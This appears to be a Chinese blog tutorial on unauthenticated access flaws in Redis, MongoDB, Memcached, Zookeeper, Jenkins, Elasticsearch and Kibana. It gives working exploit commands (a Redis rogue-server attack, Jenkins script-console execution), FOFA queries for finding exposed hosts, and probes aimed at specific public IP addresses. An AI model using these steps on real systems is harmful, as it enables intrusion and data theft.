未授权访问漏洞系列

ineedmoreMuQ2024-08-07 8:15

环境

1.此漏洞需要靶场vulhub,可自行前往gethub下载

2.需要虚拟机或云服务器等linux系统,并在此系统安装docker和docker-compose提供环境支持

3.运行docker-compose指令为docker-compose up -d即可运行当前目录下的文件

Redis未授权访问漏洞

一、进入vulhub启动docker镜像

cd /vulhub-master/redis/4-unacc

启动docker

二、在系统安装redis,见上图

redis链接6379为redis的默认端口

复制代码 
redis-cli -h 192.168.4.176 -p 6379

即可链接成功

三、可以直接连接执行命令且不需要认证说明存在未授权访问漏洞----->下载以下攻击项目...

复制代码 
 git clone https://github.com/n0b0dyCN/redis-rogue-server.git

四、使用py脚本攻击redis

复制代码 
python3 redis-rogue-server.py --rhost 192.168.30.138 --lhost 192.168.30.129

博主只有一台云服务器连不上,不想搞两个linux系统了,这个实验先这样吧

MongoDB未授权访问漏洞

复制代码 
拉取镜像:docker pull mongo
启动镜像docker run -d -p 27017:27017  mongo
查看镜像:docker ps -a

漏洞利用

使用Navicat进行连接.

实例 可以在fofo里搜索 port="27017",去找一个连一下试一试,不过别犯法了

Memcached未授权访问漏洞

下载Memcached程序并执行以下命令---->启动Memcached漏洞环境

复制代码 
下载地址:
https://www.runoob.com/memcached/window-install-memcached.html
#执行命令
memcached.exe -d install
memcached.exe -d start

步骤二使用Telnet程序探测目标的11211端口.

复制代码 
#Telnet探测
telnet 192.168.4.199 11211
#操作命令
stats //查看memcache服务状态
stats items //查看所有items
stats cachedump 390//获得缓存key
get:state:264861539228401373:261588//通过key读取相应value获得实际缓存内容,造
成敏感信息泄露

用fofa语法 port="11211"搜索

Zookeeper未授权访问漏洞

复制代码 
port="2181"搜索资产

可以使用以下语句

复制代码 
echo envi | nc 114.242.175.75 2181
echo envi | nc 223.5.253.242 2181

使用Zookeeper可视化管理工具进行连接

复制代码 
#工具下载
https://issues.apache.org/jira/secure/attachment/12436620/ZooInspector.zip

Jenkins未授权访问漏洞

使用以下fofa语法进行产品搜索

复制代码 
port="8080" && app="JENKINS" && title=="Dashboard [Jenkins]"

在打开的URL中.点击 Manage Jenkins-->Scritp Console 在执行以下命令

复制代码 
#执行命令
println "whoami".execute().text  
#命令执行页面
http://125.63.109.2:8080/manage/script/index.php

靶场复现流程

复制代码 
wget http://archives.jenkins-ci.org/redhat/jenkins-1.620-1.1.noarch.rpm
下载
复制代码 
rpm -ivh jenkins-1.620-1.1.noarch.rpm
安装

service jenkins start
启动
关防火墙
systemctl stop firewalld.service

访问服务地址

复制代码 
http://1.92.134.1:8080/manage
http://1.92.134.1:8080/script
复制代码 
#执行命令
println "whoami".execute().text

Elasticsearch未授权访问漏洞

搜索语法

"Elasticsearch" && port="9200"

存在未授权访问则直接进入到信息页面...不需要输入用户密码登陆

复制代码 
#访问测试
http://localhost:9200/_plugin/head/web管理界面
http://localhost:9200/cat/indices
http://localhost:9200/river/search 查看数据库敏感信息
http://localhost:9200/nodes查看节点数据

Kibana未授权访问漏洞

搜索语句

复制代码 
"kibana" && port="5601"

无需登录访问即存在未授权访问漏洞

Docker Remote APl未授权访问漏洞

port="8080" && app="Kubernetes"

相关推荐
漫途科技9 分钟前
精准盯防危房隐患,智守人居安全|MTB46-4-2A 4G数据采集终端专项应用方案
网络·安全
li星野1 小时前
从零构建安全文件上传系统:FastAPI + JWT + 密码哈希 + Streamlit 前端 + SQLite
安全·哈希算法·fastapi
是发财不是旺财1 小时前
Hermes 网关四层权限控制方案:让 AI Agent 安全地查数据库
数据库·安全·agent·openclaw·hermes
持敬chijing1 小时前
Web渗透之前后端漏洞-XSS漏洞原理攻击防御全流程
前端·安全·web安全·网络安全·网络攻击模型·安全威胁分析·xss
ZeroNews内网穿透1 小时前
NAS部署Hermes AI Agent + 零讯内网穿透,实现远程可管理的AI助手
人工智能·安全·ai·内网穿透
持敬chijing2 小时前
Web渗透之SQL注入总结
sql·安全·web安全·网络安全·网络攻击模型·web
kishu_iOS&AI2 小时前
LLM —— 安全和合规性
安全·大模型·agent
m0_738120722 小时前
HVV应急溯源基础——Linux 系统安全加固配置指南(一)
linux·运维·服务器·安全·网络安全·系统安全
guyuyiqi3 小时前
糖精钠检测技术科普
科技·安全·制造
布朗克1684 小时前
26 多线程基础——Thread、Runnable与线程安全
java·安全·多线程
热门推荐
01《置身钉内》原文-可播放阅读02【AI】2026 年具身智能模型和世界模型总结03GitHub 镜像站点04Claude Code、Codex、Cursor三分天下:2026年AI编程Agent生态全景剖析052026 AI 编程工具终极实战指南:Cursor vs Claude Code vs Copilot,开发者该怎么选?062026 年 AI 编程工具终极横评:Cursor vs Claude Code vs Copilot vs Windsurf07Codex 下载安装指南:Windows 和 macOS 官方版下载08AI科技热点日报 | 2026年6月1日09【踩坑记录 | 第一篇】微软商店无法使用时,如何手动安装 OpenAI Codex?附`.msix`文件系统错误解决方法10CC-Switch 下载、安装与使用配置指南【2026.5.29】